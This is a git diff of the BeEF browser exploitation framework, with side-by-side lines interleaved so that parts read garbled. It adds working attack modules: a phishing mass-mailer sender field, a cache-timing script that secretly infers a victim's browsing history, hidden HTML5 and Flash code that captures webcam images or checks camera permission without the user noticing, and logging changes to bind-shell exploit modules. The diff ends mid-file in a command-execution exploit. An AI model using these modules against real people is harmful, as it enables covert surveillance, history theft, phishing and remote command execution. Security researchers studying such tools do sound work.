def compose_email(fromname, to, name, subject, link, linktext, template) def compose_email(fromname, fromaddr, to, name, subject, link, linktext, template)
msg_id = random_string(50) begin
boundary = "------------#{random_string(24)}" msg_id = random_string(50)
rel_boundary = "------------#{random_string(24)}" boundary = "------------#{random_string(24)}"
rel_boundary = "------------#{random_string(24)}"
header = email_headers(@from, fromname, @user_agent, to, subject, msg_id, boundary)
plain_body = email_plain_body(parse_template(name, link, linktext, "#{@templates_dir}#{template}/mail.plain", template), boundary)
rel_header = email_related(rel_boundary)
html_body = email_html_body(parse_template(name, link, linktext, "#{@templates_dir}#{template}/mail.html", template),rel_boundary)
images = "" header = email_headers(fromaddr, fromname, @user_agent, to, subject, msg_id, boundary)
@config.get("#{@config_prefix}.templates.#{template}.images").each do |image| plain_body = email_plain_body(parse_template(name, link, linktext, "#{@templates_dir}#{template}/mail.plain", template), boundary)
images += email_add_image(image, "#{@templates_dir}#{template}/#{image}",rel_boundary) rel_header = email_related(rel_boundary)
end html_body = email_html_body(parse_template(name, link, linktext, "#{@templates_dir}#{template}/mail.html", template),rel_boundary)
attachments = "" images = ""
if @config.get("#{@config_prefix}.templates.#{template}.attachments") != nil @config.get("#{@config_prefix}.templates.#{template}.images").each do |image|
@config.get("#{@config_prefix}.templates.#{template}.attachments").each do |attachment| images += email_add_image(image, "#{@templates_dir}#{template}/#{image}",rel_boundary)
attachments += email_add_attachment(attachment, "#{@templates_dir}#{template}/#{attachment}",rel_boundary) end
end
end
close = email_close(boundary) attachments = ""
if @config.get("#{@config_prefix}.templates.#{template}.attachments") != nil
@config.get("#{@config_prefix}.templates.#{template}.attachments").each do |attachment|
attachments += email_add_attachment(attachment, "#{@templates_dir}#{template}/#{attachment}",rel_boundary)
end
end
message = header + plain_body + rel_header + html_body + images + attachments + close close = email_close(boundary)
print_debug "Raw Email content:\n #{message}" rescue Exception => e
message print_error "Error constructing email."
raise
end
message = header + plain_body + rel_header + html_body + images + attachments + close
print_debug "Raw Email content:\n #{message}"
message
end end
def email_headers(from, fromname, user_agent, to, subject, msg_id, boundary) def email_headers(from, fromname, user_agent, to, subject, msg_id, boundary)

17
extensions/social_engineering/rest/socialengineering.rb
View File

@@ -70,6 +70,7 @@ module BeEF
# "template": "default", # "template": "default",
# "subject": "Hi from BeEF", # "subject": "Hi from BeEF",
# "fromname": "BeEF", # "fromname": "BeEF",
# "fromaddr": "beef@beef.com",
# "link": "http://www.microsoft.com/security/online-privacy/phishing-symptoms.aspx", # "link": "http://www.microsoft.com/security/online-privacy/phishing-symptoms.aspx",
# "linktext": "http://beefproject.com", # "linktext": "http://beefproject.com",
# "recipients": [{ # "recipients": [{
@@ -85,10 +86,11 @@ module BeEF
template = body["template"] template = body["template"]
subject = body["subject"] subject = body["subject"]
fromname = body["fromname"] fromname = body["fromname"]
fromaddr = body["fromaddr"]
link = body["link"] link = body["link"]
linktext = body["linktext"] linktext = body["linktext"]
if template.nil? || subject.nil? || fromname.nil? || link.nil? || linktext.nil? if template.nil? || subject.nil? || fromaddr.nil? || fromname.nil? || link.nil? || linktext.nil?
print_error "All parameters are mandatory." print_error "All parameters are mandatory."
halt 401 halt 401
end end
@@ -106,11 +108,16 @@ module BeEF
halt 401 halt 401
end end
end end
mass_mailer = BeEF::Extension::SocialEngineering::MassMailer.instance
mass_mailer.send_email(template, fromname, subject, link, linktext, recipients)
rescue Exception => e rescue Exception => e
print_error "Invalid JSON input passed to endpoint /api/seng/clone_page" print_error "Invalid JSON input passed to endpoint /api/seng/send_emails"
error 400
end
begin
mass_mailer = BeEF::Extension::SocialEngineering::MassMailer.instance
mass_mailer.send_email(template, fromname, fromaddr, subject, link, linktext, recipients)
rescue Exception => e
print_error "Invalid mailer configuration"
error 400 error 400
end end
end end

147
modules/browser/get_visited_domains/command.js
View File

@@ -133,7 +133,7 @@ if (beef.browser.isIE() == 1) {
var MAX_ATTEMPTS = 1; var MAX_ATTEMPTS = 1;
} }
if (beef.browser.isC() == 1 || beef.browser.isO() == 1){ if (beef.browser.isO() == 1){
/**************** /****************
* SCANNED URLS * * SCANNED URLS *
****************/ ****************/
@@ -212,7 +212,7 @@ function perform_check() {
if (beef.browser.isFF() == 1) { if (beef.browser.isFF() == 1) {
setTimeout(wait_for_read, 1); setTimeout(wait_for_read, 1);
} }
if(beef.browser.isC() == 1 || beef.browser.isO() == 1){ if(beef.browser.isO() == 1){
setTimeout(wait_for_read, 1); setTimeout(wait_for_read, 1);
} }
} }
@@ -242,11 +242,10 @@ function wait_for_read() {
setTimeout(wait_for_read, 0); setTimeout(wait_for_read, 0);
} }
} }
if (beef.browser.isC() == 1 || beef.browser.isO() == 1){ if (beef.browser.isO() == 1){
try{ try{
if(frames['f'].location.href != 'about:blank'){
throw 1; if(frames['f'].location.href != 'about:blank') throw 1;
}
frames['f'].stop(); frames['f'].stop();
document.getElementById('f').src = 'javascript:"<body onload=\'parent.frame_ready = true\'>"'; document.getElementById('f').src = 'javascript:"<body onload=\'parent.frame_ready = true\'>"';
@@ -280,7 +279,7 @@ function navigate_to_target() {
if (beef.browser.isIE() == 1) { if (beef.browser.isIE() == 1) {
setTimeout(wait_for_noread, 0); setTimeout(wait_for_noread, 0);
} }
if (beef.browser.isC() == 1 || beef.browser.isO() == 1){ if (beef.browser.isO() == 1){
setTimeout(wait_for_noread, 1); setTimeout(wait_for_noread, 1);
} }
urls++; urls++;
@@ -318,7 +317,7 @@ function wait_for_noread() {
} }
sched_call(wait_for_noread); sched_call(wait_for_noread);
} }
if (beef.browser.isC() == 1 || beef.browser.isO() == 1){ if (beef.browser.isO() == 1){
if (frames['f'].location.href == undefined){ if (frames['f'].location.href == undefined){
confirm_visited = true; confirm_visited = true;
throw 1; throw 1;
@@ -343,7 +342,7 @@ function maybe_test_next() {
if (beef.browser.isIE() == 1) { if (beef.browser.isIE() == 1) {
document.getElementById("f").src = 'about:blank'; document.getElementById("f").src = 'about:blank';
} }
if (beef.browser.isC() == 1 || beef.browser.isO() == 1) { if (beef.browser.isO() == 1) {
document.getElementById('f').src = 'about:blank'; document.getElementById('f').src = 'about:blank';
} }
if (target_off < targets.length) { if (target_off < targets.length) {
@@ -396,7 +395,7 @@ function reload(){
/* The handler for "run the test" button on the main page. Dispenses /* The handler for "run the test" button on the main page. Dispenses
advice, resets state if necessary. */ advice, resets state if necessary. */
function start_stuff() { function start_stuff() {
if (beef.browser.isFF() == 1 || beef.browser.isIE() == 1 || beef.browser.isC() == 1 || beef.browser.isO() == 1) { if (beef.browser.isFF() == 1 || beef.browser.isIE() == 1 || beef.browser.isO() == 1) {
target_off = 0; target_off = 0;
attempt = 0; attempt = 0;
confirmed_visited = false; confirmed_visited = false;
@@ -409,11 +408,139 @@ function start_stuff() {
} }
} }
/**************/
/***Visipisi***/
/**************/
var vp_result = {};
var visipisi = {
webkit: function(url, cb) {
var start;
var loaded = false;
var runtest = function() {
window.removeEventListener("message", runtest, false);
var img = new Image();
start = new Date().getTime();
try{
img.src = url;
} catch(e) {}
var messageCB = function (e){
var now = new Date().getTime();
if (img.complete) {
delete img;
window.removeEventListener("message", messageCB, false);
cbWrap(true);
} else if (now - start > 10) {
delete img;
if (window.stop !== undefined)
window.stop();
else
document.execCommand("Stop",false);
window.removeEventListener("message", messageCB, false);
cbWrap(false);
} else {
window.postMessage('','*');
}
};
window.addEventListener("message", messageCB, false);
window.postMessage('','*');
};
cbWrap = function (value) {cb(value);};
window.addEventListener("message", runtest, false);
window.postMessage('','*');
}
};
function visipisiCB(vp, endCB, sites, urls, site, result){
if(result === null){
vp_result[site] = 'Whoops';
}
else{
vp_result[site] = result ? 'visited' : 'not visited';
}
var next_site = sites.pop();
if(next_site)
vp( urls[next_site], function (result) {
visipisiCB(vp, endCB, sites, urls, next_site, result);
});
else
endCB();
}
function getVisitedDomains(){
var tests = {
facebook: 'https://s-static.ak.facebook.com/rsrc.php/v1/yJ/r/vOykDL15P0R.png',
twitter: 'https://twitter.com/images/spinner.gif',
digg: 'http://cdn2.diggstatic.com/img/sprites/global.5b25823e.png',
reddit: 'http://www.redditstatic.com/sprite-reddit.pZL22qP4ous.png',
hn: 'http://ycombinator.com/images/y18.gif',
stumbleupon: 'http://cdn.stumble-upon.com/i/bg/logo_su.png',
wired: 'http://www.wired.com/images/home/wired_logo.gif',
xkcd: 'http://imgs.xkcd.com/s/9be30a7.png',
linkedin: 'http://static01.linkedin.com/scds/common/u/img/sprite/sprite_global_v6.png',
slashdot: 'http://a.fsdn.com/sd/logo_w_l.png',
myspace: 'http://cms.myspacecdn.com/cms/x/11/47/title-WhatsHotWhite.jpg',
engadget: 'http://www.blogsmithmedia.com/www.engadget.com/media/engadget_logo.png',
lastfm: 'http://cdn.lst.fm/flatness/anonhome/1/anon-sprite.png',
pandora: 'http://www.pandora.com/img/logo.png',
youtube: 'http://s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif',
yahoo: 'http://l.yimg.com/ao/i/mp/properties/frontpage/01/img/aufrontpage-sprite.s1740.gif',
google: 'https://www.google.com/intl/en_com/images/srpr/logo3w.png',
hotmail: 'https://secure.shared.live.com/~Live.SiteContent.ID/~16.2.8/~/~/~/~/images/iconmap.png',
cnn: 'http://i.cdn.turner.com/cnn/.element/img/3.0/global/header/intl/hdr-globe-central.gif',
bbc: 'http://static.bbc.co.uk/frameworks/barlesque/1.21.2/desktop/3/img/blocks/light.png',
reuters: 'http://www.reuters.com/resources_v2/images/masthead-logo.gif',
wikipedia: 'http://upload.wikimedia.org/wikipedia/en/b/bc/Wiki.png',
amazon: 'http://g-ecx.images-amazon.com/images/G/01/gno/images/orangeBlue/navPackedSprites-US-22._V183711641_.png',
ebay: 'http://p.ebaystatic.com/aw/pics/au/logos/logoEbay_x45.gif',
newegg: 'http://images10.newegg.com/WebResource/Themes/2005/Nest/neLogo.png',
bestbuy: 'http://images.bestbuy.com/BestBuy_US/en_US/images/global/header/hdr_logo.gif',
walmart: 'http://i2.walmartimages.com/i/header_wide/walmart_logo_214x54.gif',
perfectgirls: 'http://www.perfectgirls.net/img/logoPG_02.jpg',
abebooks: 'http://www.abebooks.com/images/HeaderFooter/siteRevamp/AbeBooks-logo.gif',
msy: 'http://msy.com.au/images/MSYLogo-long.gif',
techbuy: 'http://www.techbuy.com.au/themes/default/images/tblogo.jpg',
borders: 'http://www.borders.com.au/images/ui/logo-site-footer.gif',
mozilla: 'http://www.mozilla.org/images/template/screen/logo_footer.png',
anandtech: 'http://www.anandtech.com/content/images/globals/header_logo.png',
tomshardware: 'http://m.bestofmedia.com/i/tomshardware/v3/logo_th.png',
shopbot: 'http://i.shopbot.com.au/s/i/logo/en_AU/shopbot.gif',
staticice: 'http://staticice.com.au/images/banner.jpg',
};
var sites = [];
for (var k in tests)
sites.push(k);
sites.reverse();
vp = visipisi.webkit;
var first_site = sites.pop();
var end = function() {
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results='+prepResult(vp_result));
}
vp(tests[first_site], function(result) {
visipisiCB(vp, end, sites, tests, first_site, result);
});
}
function prepResult(results){
var result_str ='<br>';
for(r in results){
result_str += r + ':' + results[r]+'<br>';
}
return result_str;
}
beef.execute(function() { beef.execute(function() {
if(beef.browser.isC() == 1){
getVisitedDomains();
} else {
urls = undefined; urls = undefined;
exec_next = null; exec_next = null;
start_stuff(); start_stuff();
}
}); });

2
modules/browser/get_visited_domains/config.yaml
View File

@@ -10,7 +10,7 @@ beef:
category: "Browser" category: "Browser"
name: "Get Visited Domains" name: "Get Visited Domains"
description: "This module will retrieve rapid history extraction through non-destructive cache timing.\nBased on work done by Michal Zalewski at http://lcamtuf.coredump.cx/cachetime/" description: "This module will retrieve rapid history extraction through non-destructive cache timing.\nBased on work done by Michal Zalewski at http://lcamtuf.coredump.cx/cachetime/"
authors: ["@keith55", "quentin"] authors: ["@keith55", "oxplot", "quentin"]
target: target:
working: ["FF", "IE", "O"] working: ["FF", "IE", "O"]
not_working: ["C", "S"] not_working: ["C", "S"]

2
modules/browser/hooked_domain/deface_web_page_component/config.yaml
View File

@@ -10,6 +10,6 @@ beef:
category: ["Browser", "Hooked Domain"] category: ["Browser", "Hooked Domain"]
name: "Replace Component (Deface)" name: "Replace Component (Deface)"
description: "Overwrite a particular component of the hooked page." description: "Overwrite a particular component of the hooked page."
authors: ["antisnatchor","xntrik"] authors: ["antisnatchor", "xntrik"]
target: target:
user_notify: ['ALL'] user_notify: ['ALL']

2
modules/browser/webcam/command.js
View File

@@ -22,7 +22,7 @@ beef.execute(function() {
//These 4 function names [noCamera(), noCamera(), pressedDisallow(), pictureCallback(picture), allPicturesTaken()] are hard coded in the swf actionscript3. Flash will invoke these functions directly. The picture for the pictureCallback function will be a base64 encoded JPG string //These 4 function names [noCamera(), noCamera(), pressedDisallow(), pictureCallback(picture), allPicturesTaken()] are hard coded in the swf actionscript3. Flash will invoke these functions directly. The picture for the pictureCallback function will be a base64 encoded JPG string
var js_functions = '<script>function noCamera() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=The user has no camera"); }; function pressedAllow() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=User pressed allow, you should get pictures soon"); }; function pressedDisallow() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=User pressed disallow, you won\'t get pictures"); }; function pictureCallback(picture) { beef.net.send("<%= @command_url %>", <%= @command_id %>, "picture="+picture); }; function allPicturesTaken(){ }'; var js_functions = '<script>function noCamera() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=The user has no camera"); }; function pressedAllow() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=User pressed allow, you should get pictures soon"); }; function pressedDisallow() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=User pressed disallow, you won\'t get pictures"); }; function pictureCallback(picture) { beef.net.send("<%= @command_url %>", <%= @command_id %>, "image="+picture); }; function allPicturesTaken(){ }';
//This function is called by swfobject, if if fails to add the flash file to the page //This function is called by swfobject, if if fails to add the flash file to the page

50
modules/browser/webcam_html5/command.js Normal file
View File

@@ -0,0 +1,50 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var vid_id = beef.dom.generateID();
var can_id = beef.dom.generateID();
var vid_el = beef.dom.createElement('video',{'id':vid_id,'style':'display:none;','autoplay':'true'});
var can_el = beef.dom.createElement('canvas',{'id':can_id,'style':'display:none;','width':'640','height':'480'});
$j('body').append(vid_el);
$j('body').append(can_el);
var ctx = can_el.getContext('2d');
var localMediaStream = null;
var cap = function() {
if (localMediaStream) {
ctx.drawImage(vid_el,0,0);
beef.net.send("<%= @command_url %>",<%= @command_id %>, 'image='+can_el.toDataURL('image/png'));
} else {
beef.net.send("<%= @command_url %>",<%= @command_id %>, 'result=something went wrong');
}
}
window.URL = window.URL || window.webkitURL;
navigator.getUserMedia = navigator.getUserMedia || navigator.webkitGetUserMedia || navigator.mozGetUserMedia || navigator.msGetUserMedia;
navigator.getUserMedia({video:true},function(stream) {
vid_el.src = window.URL.createObjectURL(stream);
localMediaStream = stream;
setTimeout(cap,2000);
}, function(err) {
beef.net.send("<%= @command_url %>",<%= @command_id %>, 'result=getUserMedia call failed');
});
});

16
modules/browser/webcam_html5/config.yaml Normal file
View File

@@ -0,0 +1,16 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
webcam_html5:
enable: true
category: "Browser"
name: "Webcam HTML5"
description: "This module will leverage HTML5s WebRTC to capture webcam images. Only tested in Chrome, and it will display a dialog to ask if the user wants to enable their webcam."
authors: ["xntrik"]
target:
user_notify: ["C"]
unknown: ["All"]

16
modules/browser/webcam_html5/module.rb Normal file
View File

@@ -0,0 +1,16 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
require 'base64'
class Webcam_html5 < BeEF::Core::Command
def post_execute
content = {}
content["result"] = @datastore["result"] if not @datastore["result"].nil?
content["image"] = @datastore["image"] if not @datastore["image"].nil?
save content
end
end

54
modules/browser/webcam_permission_check/cameraCheck.as Normal file
View File

@@ -0,0 +1,54 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
// Source ActionScript for cameraCheck.swf
package {
import flash.display.Sprite;
import flash.external.ExternalInterface;
import flash.media.Camera;
import flash.system.Security;
import flash.system.SecurityPanel;
public class CamCheck extends Sprite {
var _cam:Camera;
public function CamCheck() {
if (Camera.isSupported) {
this._cam = Camera.getCamera();
if (!this._cam) {
//Either the camera is not available or some other error has occured
ExternalInterface.call("naPermissions");
} else if (this._cam.muted) {
//The user has not allowed access to the camera
ExternalInterface.call("noPermissions");
// Uncomment this show the privacy/security settings window
//Security.showSettings(SecurityPanel.PRIVACY);
} else {
//The user has allowed access to the camera
ExternalInterface.call("yesPermissions");
}
} else {
//Camera Not Supported
ExternalInterface.call("naPermissions");
}
}
}
}

BIN
modules/browser/webcam_permission_check/cameraCheck.swf Normal file
View File

Binary file not shown.

79
modules/browser/webcam_permission_check/command.js Normal file
View File

@@ -0,0 +1,79 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
//These 3 functions [naPermissions() The camera is not available or not supported
// yesPermissions() The user is allowing access to the camera / mic
// yesPermissions() The user has not allowed access to the camera / mic
// Flash will invoke these functions directly.
//var js_functions = '<script>function noPermissions() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=The user has not allowed BeEF to access the camera :("); }; function yesPermissions() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=The user has allowed BeEF to access the camera :D"); }; function naPermissions() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Camera not supported / available :/"); }; ';
//This function is called by swfobject, if if fails to add the flash file to the page
//js_functions += 'function swfobjectCallback(e) { if(e.success){beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Swfobject successfully added flash object to the victim page");}else{beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Swfobject was not able to add the swf file to the page. This could mean there was no flash plugin installed.");} };</script>';
//These functions are global so they can accessed by the cameraCheck.swf file
noPermissions = function() {
beef.net.send("<%= @command_url %>",<%= @command_id %>,"result=The user has not allowed BeEF to access the camera :(");
}
yesPermissions = function() {
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=The user has allowed BeEF to access the camera :D");
}
naPermissions = function() {
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Camera not supported / available :/&unmount=true");
}
//After the swfobject loads the SWF file, this callback sends a status back to BeEF
var swfobjectCallback = function(e) {
if(e.success){
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Swfobject successfully added flash object to the victim page");
} else {
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Swfobject was not able to add the swf file to the page. This could mean there was no flash plugin installed.");
}
}
//This is the DIV for the flash object
var body_flash_container = '<div id="main" style="position:absolute;top:150px;left:80px;width:1px;height:1px;opacity:0.8;"></div>';
$j('body').append(body_flash_container);
// Lets execute swfobject.js
// If it works, we then run it to embed the swf file into the above div
$j.getScript(beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/swfobject.js',function(data,txtStatus,jqxhr) {
var flashvars = {};
var parameters = {};
parameters.scale = "noscale";
parameters.wmode = "opaque";
parameters.allowFullScreen = "true";
parameters.allowScriptAccess = "always";
var attributes = {};
swfobject.embedSWF(beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/cameraCheck.swf', "main", "1", "1", "9", "expressInstall.swf", flashvars, parameters, attributes, swfobjectCallback);
});
//A library that helps include the swf file
//var swfobject_script = '<script type="text/javascript" src="http://'+beef.net.host+':'+beef.net.port+'/swfobject.js"></script>'
//This is the javascript that actually calls the swfobject library to include the swf file
//var include_script = '<script>var flashvars = {}; var parameters = {}; parameters.scale = "noscale"; parameters.wmode = "opaque"; parameters.allowFullScreen = "true"; parameters.allowScriptAccess = "always"; var attributes = {}; swfobject.embedSWF("http://'+beef.net.host+':'+beef.net.port+'/cameraCheck.swf", "main", "1", "1", "9", "expressInstall.swf", flashvars, parameters, attributes, swfobjectCallback);</script>';
//Add flash content
//$j('body').append(js_functions, swfobject_script, body_flash_container, include_script);
});

15
modules/browser/webcam_permission_check/config.yaml Normal file
View File

@@ -0,0 +1,15 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
webcam_permission_check:
enable: true
category: "Browser"
name: "Webcam Permission Check"
description: "This module will check to see if the user has allowed the BeEF domain (or all domains) to access the Camera and Mic with Flash. This module is transparent and should not be detected by the user (ie. no popup requesting permission will appear)"
authors: ["@bw_z"]
target:
working: ["All"]

19
modules/browser/webcam_permission_check/module.rb Normal file
View File

@@ -0,0 +1,19 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Webcam_permission_check < BeEF::Core::Command
def pre_send
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/webcam_permission_check/cameraCheck.swf', '/cameraCheck', 'swf')
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/webcam_permission_check/swfobject.js', '/swfobject', 'js')
end
def post_execute
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/cameraCheck.swf')
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/swfobject.js')
end
end

4
modules/browser/webcam_permission_check/swfobject.js Normal file
View File

File diff suppressed because one or more lines are too long

17
modules/debug/test_beef_debug/command.js Normal file
View File

@@ -0,0 +1,17 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
try {
var msg = "<%= @msg.gsub(/"/, '\\"') %>";
beef.debug(msg);
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=called the beef.debug() function. Check the developer console for your debug message.');
} catch(e) {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=something went wrong&error='+e.message);
}
});

16
modules/debug/test_beef_debug/config.yaml Normal file
View File

@@ -0,0 +1,16 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
test_beef_debug:
enable: true
category: "Debug"
name: "Test beef.debug()"
description: "Test the 'beef.debug()' function. This function wraps 'console.log()'"
authors: ["bcoles"]
target:
working: ["All"]
not_working: ["IE"]

20
modules/debug/test_beef_debug/module.rb Normal file
View File

@@ -0,0 +1,20 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Test_beef_debug < BeEF::Core::Command
def self.options
return [
{'name' => 'msg', 'description' => 'Debug Message', 'ui_label' => 'Debug Message', 'value' => "Test string for beef.debug() function", 'type' => 'textarea', 'width' => '400px', 'height' => '50px' }
]
end
def post_execute
content = {}
content['Result'] = @datastore['result']
save content
end
end

12
modules/debug/test_return_image/command.js Normal file
View File

File diff suppressed because one or more lines are too long

15
modules/debug/test_return_image/config.yaml Normal file
View File

@@ -0,0 +1,15 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
test_return_image:
enable: true
category: "Debug"
name: "Return Image"
description: "This module will test returning a PNG image as a base64 encoded string. The image should be rendered in the BeEF web interface."
authors: ["bcoles"]
target:
working: ["ALL"]

14
modules/debug/test_return_image/module.rb Normal file
View File

@@ -0,0 +1,14 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Test_return_image < BeEF::Core::Command
def post_execute
content = {}
content['image'] = @datastore['image']
save content
end
end

12
modules/exploits/beefbind/beef_bind_shell/command.js
View File

@@ -31,15 +31,15 @@ beef.execute(function () {
xhr.onreadystatechange = function(){ xhr.onreadystatechange = function(){
if(xhr.readyState == 4){ if(xhr.readyState == 4){
var result = strip_output(xhr.responseText); var result = strip_output(xhr.responseText);
console.log("result.length: " + result.length); beef.debug("result.length: " + result.length);
if(result.length != 0){ if(result.length != 0){
console.log("get_additional_cmd_results - readyState == 4: request [" + counter + "]\r\n" + result); beef.debug("get_additional_cmd_results - readyState == 4: request [" + counter + "]\r\n" + result);
beef.net.send("<%= @command_url %>", <%= @command_id %>, result); beef.net.send("<%= @command_url %>", <%= @command_id %>, result);
counter++; counter++;
setTimeout("get_additional_cmd_results()",500); setTimeout("get_additional_cmd_results()",500);
} }
}else{ // No more command results, ready to send another command. }else{ // No more command results, ready to send another command.
console.log("get_additional_cmd_results - readyState != 4: request [" + counter + "]"); beef.debug("get_additional_cmd_results - readyState != 4: request [" + counter + "]");
} }
}; };
xhr.open("GET", uri, false); xhr.open("GET", uri, false);
@@ -51,9 +51,9 @@ beef.execute(function () {
xhr = new XMLHttpRequest(); xhr = new XMLHttpRequest();
xhr.onreadystatechange = function(){ xhr.onreadystatechange = function(){
if(xhr.readyState == 4){ if(xhr.readyState == 4){
console.log("get_prompt: Retrieved prompt"); beef.debug("get_prompt: Retrieved prompt");
var prompt = strip_output(xhr.responseText); var prompt = strip_output(xhr.responseText);
console.log(prompt); beef.debug(prompt);
beef.net.send("<%= @command_url %>", <%= @command_id %>, prompt); beef.net.send("<%= @command_url %>", <%= @command_id %>, prompt);
//send command //send command
@@ -68,7 +68,7 @@ beef.execute(function () {
xhr = new XMLHttpRequest(); xhr = new XMLHttpRequest();
xhr.onreadystatechange = function(){ xhr.onreadystatechange = function(){
var cmd_result = strip_output(xhr.responseText); var cmd_result = strip_output(xhr.responseText);
console.log(cmd_result); beef.debug(cmd_result);
beef.net.send("<%= @command_url %>", <%= @command_id %>, cmd_result); beef.net.send("<%= @command_url %>", <%= @command_id %>, cmd_result);
}; };
xhr.open("POST", uri, false); xhr.open("POST", uri, false);

10
modules/exploits/beefbind/beef_bind_staged_deploy/command.js
View File

@@ -295,7 +295,7 @@ beef.execute(function () {
// this is required only with WebKit browsers. // this is required only with WebKit browsers.
if (typeof XMLHttpRequest.prototype.sendAsBinary == 'undefined' && Uint8Array) { if (typeof XMLHttpRequest.prototype.sendAsBinary == 'undefined' && Uint8Array) {
console.log("WebKit browser: Patched XmlHttpRequest to support sendAsBinary."); beef.debug("WebKit browser: Patched XmlHttpRequest to support sendAsBinary.");
XMLHttpRequest.prototype.sendAsBinary = function(datastr) { XMLHttpRequest.prototype.sendAsBinary = function(datastr) {
function byteValue(x) { function byteValue(x) {
return x.charCodeAt(0) & 0xff; return x.charCodeAt(0) & 0xff;
@@ -310,7 +310,7 @@ beef.execute(function () {
log("send_stager: stager sent."); log("send_stager: stager sent.");
stager_successfull = true; stager_successfull = true;
}catch(exception){ }catch(exception){
console.log("!!! Exception: " + exception); beef.debug("!!! Exception: " + exception);
// Check for PortBanning exceptions: // Check for PortBanning exceptions:
//NS_ERROR_PORT_ACCESS_NOT_ALLOWED: Establishing a connection to an unsafe or otherwise banned port was prohibited //NS_ERROR_PORT_ACCESS_NOT_ALLOWED: Establishing a connection to an unsafe or otherwise banned port was prohibited
if(exception.toString().indexOf('NS_ERROR_PORT_ACCESS_NOT_ALLOWED') != -1){ if(exception.toString().indexOf('NS_ERROR_PORT_ACCESS_NOT_ALLOWED') != -1){
@@ -335,13 +335,13 @@ beef.execute(function () {
var uri = "http://" + rhost + ":" + rport + path; var uri = "http://" + rhost + ":" + rport + path;
xhr = new XMLHttpRequest(); xhr = new XMLHttpRequest();
console.log("uri: " + uri); beef.debug("uri: " + uri);
xhr.open("POST", uri, true); xhr.open("POST", uri, true);
xhr.setRequestHeader("Content-Type", "text/plain"); xhr.setRequestHeader("Content-Type", "text/plain");
// this is required only with WebKit browsers. // this is required only with WebKit browsers.
if (typeof XMLHttpRequest.prototype.sendAsBinary == 'undefined' && Uint8Array) { if (typeof XMLHttpRequest.prototype.sendAsBinary == 'undefined' && Uint8Array) {
console.log("WebKit browser: Patched XmlHttpRequest to support sendAsBinary."); beef.debug("WebKit browser: Patched XmlHttpRequest to support sendAsBinary.");
XMLHttpRequest.prototype.sendAsBinary = function(datastr) { XMLHttpRequest.prototype.sendAsBinary = function(datastr) {
function byteValue(x) { function byteValue(x) {
return x.charCodeAt(0) & 0xff; return x.charCodeAt(0) & 0xff;
@@ -362,7 +362,7 @@ beef.execute(function () {
log = function(data){ log = function(data){
beef.net.send("<%= @command_url %>", <%= @command_id %>, data); beef.net.send("<%= @command_url %>", <%= @command_id %>, data);
console.log(data); beef.debug(data);
}; };

43
modules/exploits/extract_cmd_exec/command.js Normal file
View File

@@ -0,0 +1,43 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var rhost = '<%= @rhost %>';
var rport = '<%= @rport %>';
var timeout = '<%= @timeout %>';
